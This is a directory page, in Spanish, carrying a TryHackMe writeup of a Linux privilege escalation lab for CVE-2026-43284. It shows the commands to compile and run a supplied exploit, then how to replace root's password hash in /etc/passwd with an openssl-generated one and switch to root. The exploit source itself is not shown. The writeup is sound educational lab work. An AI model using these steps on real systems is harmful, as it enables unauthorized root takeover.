Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-43284---DirtyFrag-Analysis-THM- — TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup | Kitploit
Herramientas/GitHubGitHub/revyhub/cve-2026-43284---dirtyfrag-analysis-thm-
Privilege EscalationVulnerability AnalysisExploitationCTFLearning & EducationLabs & Practice
GitHubrevyhub/cve-2026-43284---dirtyfrag-analysis-thm-

CVE-2026-43284---DirtyFrag-Analysis-THM-

TryHackMe Dirty Frag (CVE-2026-43284) — Linux LPE writeup

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
1hace 18 díasAún no revisado

TryHackMe — CVE-2026-43284: Dirty Frag

Sala: CVE-2026-43284: Dirty Frag Categoría: Escalada de privilegios en Linux Autor: (Mi página)

Resumen

Dirty Frag es una sala encadenada de escalada de privilegios local (LPE) en Linux construida en torno a CVE-2026-43284. El objetivo es pasar de una shell sin privilegios a root explotando un exploit de prueba de concepto proporcionado.

Enumeración inicial

Al listar el directorio de trabajo se revelan los archivos proporcionados para el exploit:

root@kitploit:~
$ ls
README.txt
exp
exp.c
  • exp.c — el código fuente del exploit
  • exp — un binario precompilado (puede que no coincida con el entorno objetivo)
  • README.txt — notas de uso proporcionadas con el exploit

Compilando el exploit

Dado que el binario exp proporcionado puede no ser compatible con el entorno exacto del objetivo, es más seguro recompilarlo desde el código fuente:

root@kitploit:~
$ gcc -O0 -Wall -o exp exp.c -lutil
  • -O0 desactiva las optimizaciones del compilador, manteniendo un comportamiento predecible y acorde al código fuente
  • -Wall habilita las advertencias del compilador, útiles para verificar la corrección de la compilación
  • -lutil enlaza libutil — normalmente necesario cuando el código usa funciones de pseudo-terminal (pty)

Desencadenando la vulnerabilidad

root@kitploit:~
$ ./exp

Ejecutar el exploit compilado desencadena el fallo subyacente, lo que da como resultado acceso de escritura a un archivo que normalmente debería ser de solo lectura para usuarios sin privilegios — en este caso, /etc/passwd.

Escalando a root

Una vez obtenido el acceso de escritura, se genera un nuevo hash de contraseña para root:

root@kitploit:~
$ openssl passwd -1 root
$1$igIXG8so$6K9OaEbAaj.qaknYx9ST..

Este hash se escribe en /etc/passwd en lugar del campo de hash existente de root:

root@kitploit:~
$ nano /etc/passwd

Con la contraseña de root ya conocida, cambiar de usuario es sencillo:

root@kitploit:~
$ su root

Capturando la bandera

root@kitploit:~
$ cat /root/flag.txt
THM{REDACTED}

Lecciones aprendidas

  • (Originalmente me llevó más de 30 minutos entenderlo en general, pero una vez que lo comprendí pude repetir el mismo exploit varias veces)
  • (El código interno de root es extraño; no puedes seleccionar y usar los controles base, así que en su lugar usas las teclas de flecha para navegar hasta root❌ y cambiar la X por el hash que creaste)

Mitigaciones

  • Mantén los paquetes del kernel/sistema parcheados y actualizados

Este writeup documenta una sala de TryHackMe completada con fines educativos. El entorno objetivo es una máquina intencionalmente vulnerable proporcionada por TryHackMe.

Descargar herramienta